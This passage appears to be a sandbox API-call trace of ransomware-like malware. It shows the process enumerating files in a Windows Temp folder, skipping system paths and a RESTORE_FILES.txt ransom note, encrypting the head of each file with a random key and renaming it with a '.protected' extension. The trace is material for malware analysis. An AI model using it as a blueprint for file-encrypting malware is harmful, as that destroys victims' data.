HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ode5vxhncsjoyziwyf.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ode5vxhncsjoyziwyf.mkv.protected")) returned 1 [0086.873] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.873] lstrcmpiW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="Windows") returned -1 [0086.873] lstrcmpiW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="Program Files") returned -1 [0086.873] lstrcmpiW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="Program Files (x86)") returned -1 [0086.873] lstrcmpiW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="$Recycle.bin") returned 1 [0086.873] lstrcmpiW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="System Volume Information") returned -1 [0086.873] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc") returned 75 [0086.873] StrStrIW (lpFirst="oeOSjXGFHavOUNXF5y.doc", lpSrch=".protected") returned 0x0 [0086.873] lstrcmpW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="RESTORE_FILES.txt") returned -1 [0086.873] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.873] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\oeosjxgfhavounxf5y.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.873] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc") returned 75 [0086.873] StrStrW (lpFirst="oeOSjXGFHavOUNXF5y.doc", lpSrch=".txt") returned 0x0 [0086.873] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc") returned 75 [0086.873] StrStrW (lpFirst="oeOSjXGFHavOUNXF5y.doc", lpSrch=".rar") returned 0x0 [0086.873] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc") returned 75 [0086.874] StrStrW (lpFirst="oeOSjXGFHavOUNXF5y.doc", lpSrch=".zip") returned 0x0 [0086.874] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.875] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.875] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.875] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.875] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.875] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.876] CloseHandle 
(hObject=0xd8) returned 1 [0086.876] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc.protected") returned 85 [0086.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\oeosjxgfhavounxf5y.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\oeosjxgfhavounxf5y.doc.protected")) returned 1 [0086.877] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.877] lstrcmpiW (lpString1="psIA4g.bmp", lpString2="Windows") returned -1 [0086.877] lstrcmpiW (lpString1="psIA4g.bmp", lpString2="Program Files") returned 1 [0086.877] lstrcmpiW (lpString1="psIA4g.bmp", lpString2="Program Files (x86)") returned 1 [0086.877] lstrcmpiW (lpString1="psIA4g.bmp", lpString2="$Recycle.bin") returned 1 [0086.877] lstrcmpiW (lpString1="psIA4g.bmp", lpString2="System Volume Information") returned -1 [0086.877] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp") returned 63 [0086.877] StrStrIW (lpFirst="psIA4g.bmp", lpSrch=".protected") returned 0x0 [0086.877] lstrcmpW (lpString1="psIA4g.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0086.877] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.878] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\psia4g.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.878] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp") returned 63 [0086.878] StrStrW (lpFirst="psIA4g.bmp", lpSrch=".txt") returned 0x0 [0086.878] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp") returned 63 [0086.878] StrStrW (lpFirst="psIA4g.bmp", lpSrch=".rar") returned 0x0 [0086.878] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp") returned 63 [0086.878] StrStrW (lpFirst="psIA4g.bmp", lpSrch=".zip") returned 0x0 [0086.878] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.879] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.879] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.880] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.880] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.880] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.880] CloseHandle (hObject=0xd8) returned 1 [0086.882] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp.protected") returned 73 [0086.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\psia4g.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\psia4g.bmp.protected")) returned 1 [0086.883] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.883] lstrcmpiW (lpString1="PZRAEq.pps", lpString2="Windows") returned -1 [0086.883] lstrcmpiW (lpString1="PZRAEq.pps", lpString2="Program Files") returned 1 [0086.883] lstrcmpiW (lpString1="PZRAEq.pps", lpString2="Program Files (x86)") returned 1 [0086.883] lstrcmpiW (lpString1="PZRAEq.pps", lpString2="$Recycle.bin") returned 1 [0086.883] lstrcmpiW (lpString1="PZRAEq.pps", lpString2="System Volume Information") returned -1 [0086.883] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps") returned 63 [0086.883] StrStrIW (lpFirst="PZRAEq.pps", lpSrch=".protected") returned 0x0 [0086.883] lstrcmpW (lpString1="PZRAEq.pps", lpString2="RESTORE_FILES.txt") returned -1 [0086.883] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.883] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pzraeq.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.884] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps") returned 63 [0086.884] StrStrW (lpFirst="PZRAEq.pps", lpSrch=".txt") returned 0x0 [0086.884] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps") returned 63 [0086.884] StrStrW (lpFirst="PZRAEq.pps", lpSrch=".rar") returned 0x0 [0086.884] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps") returned 63 [0086.884] StrStrW (lpFirst="PZRAEq.pps", lpSrch=".zip") returned 0x0 [0086.884] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.885] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.885] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.885] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.886] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.886] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | 
out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.886] CloseHandle (hObject=0xd8) returned 1 [0086.886] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps.protected") returned 73 [0086.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pzraeq.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pzraeq.pps.protected")) returned 1 [0086.887] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.887] lstrcmpiW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="Windows") returned -1 [0086.887] lstrcmpiW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="Program Files") returned 1 [0086.887] lstrcmpiW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="Program Files (x86)") returned 1 [0086.887] lstrcmpiW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="$Recycle.bin") returned 1 [0086.887] lstrcmpiW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="System Volume Information") returned -1 [0086.887] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg") returned 71 [0086.887] StrStrIW (lpFirst="SHCjkXKVikAOA8.jpg", lpSrch=".protected") returned 0x0 [0086.887] lstrcmpW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0086.888] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.888] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) 
returned 1 [0086.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\shcjkxkvikaoa8.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.888] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg") returned 71 [0086.888] StrStrW (lpFirst="SHCjkXKVikAOA8.jpg", lpSrch=".txt") returned 0x0 [0086.888] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg") returned 71 [0086.888] StrStrW (lpFirst="SHCjkXKVikAOA8.jpg", lpSrch=".rar") returned 0x0 [0086.888] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg") returned 71 [0086.888] StrStrW (lpFirst="SHCjkXKVikAOA8.jpg", lpSrch=".zip") returned 0x0 [0086.888] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x1ada, lpOverlapped=0x0) returned 1 [0086.889] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffe526, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.889] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1ada, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x1ada, lpOverlapped=0x0) returned 1 [0086.890] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.890] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 
1 [0086.890] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.890] CloseHandle (hObject=0xd8) returned 1 [0086.891] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg.protected") returned 81 [0086.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\shcjkxkvikaoa8.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\shcjkxkvikaoa8.jpg.protected")) returned 1 [0086.891] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.892] lstrcmpiW (lpString1="SldrIfqBqG4e.mp3", lpString2="Windows") returned -1 [0086.892] lstrcmpiW (lpString1="SldrIfqBqG4e.mp3", lpString2="Program Files") returned 1 [0086.892] lstrcmpiW (lpString1="SldrIfqBqG4e.mp3", lpString2="Program Files (x86)") returned 1 [0086.892] lstrcmpiW (lpString1="SldrIfqBqG4e.mp3", lpString2="$Recycle.bin") returned 1 [0086.892] lstrcmpiW (lpString1="SldrIfqBqG4e.mp3", lpString2="System Volume Information") returned -1 [0086.892] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3") returned 69 [0086.892] StrStrIW (lpFirst="SldrIfqBqG4e.mp3", lpSrch=".protected") returned 0x0 [0086.892] lstrcmpW (lpString1="SldrIfqBqG4e.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0086.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.892] CryptEncrypt 
(in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sldrifqbqg4e.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3") returned 69 [0086.892] StrStrW (lpFirst="SldrIfqBqG4e.mp3", lpSrch=".txt") returned 0x0 [0086.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3") returned 69 [0086.892] StrStrW (lpFirst="SldrIfqBqG4e.mp3", lpSrch=".rar") returned 0x0 [0086.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3") returned 69 [0086.892] StrStrW (lpFirst="SldrIfqBqG4e.mp3", lpSrch=".zip") returned 0x0 [0086.892] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.893] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.893] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.894] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.894] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.894] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.894] CloseHandle (hObject=0xd8) returned 1 [0086.895] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3.protected") returned 79 [0086.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sldrifqbqg4e.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sldrifqbqg4e.mp3.protected")) returned 1 [0086.896] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.896] lstrcmpiW (lpString1="symNKTPrMBv.flv", lpString2="Windows") returned -1 [0086.896] lstrcmpiW (lpString1="symNKTPrMBv.flv", lpString2="Program Files") returned 1 [0086.896] lstrcmpiW (lpString1="symNKTPrMBv.flv", lpString2="Program Files (x86)") returned 1 [0086.896] lstrcmpiW (lpString1="symNKTPrMBv.flv", lpString2="$Recycle.bin") returned 1 [0086.896] lstrcmpiW (lpString1="symNKTPrMBv.flv", lpString2="System Volume Information") returned -1 [0086.896] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv") returned 68 [0086.896] StrStrIW (lpFirst="symNKTPrMBv.flv", lpSrch=".protected") returned 0x0 [0086.896] lstrcmpW (lpString1="symNKTPrMBv.flv", lpString2="RESTORE_FILES.txt") 
returned 1 [0086.896] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.896] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\symnktprmbv.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv") returned 68 [0086.897] StrStrW (lpFirst="symNKTPrMBv.flv", lpSrch=".txt") returned 0x0 [0086.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv") returned 68 [0086.897] StrStrW (lpFirst="symNKTPrMBv.flv", lpSrch=".rar") returned 0x0 [0086.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv") returned 68 [0086.897] StrStrW (lpFirst="symNKTPrMBv.flv", lpSrch=".zip") returned 0x0 [0086.897] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) 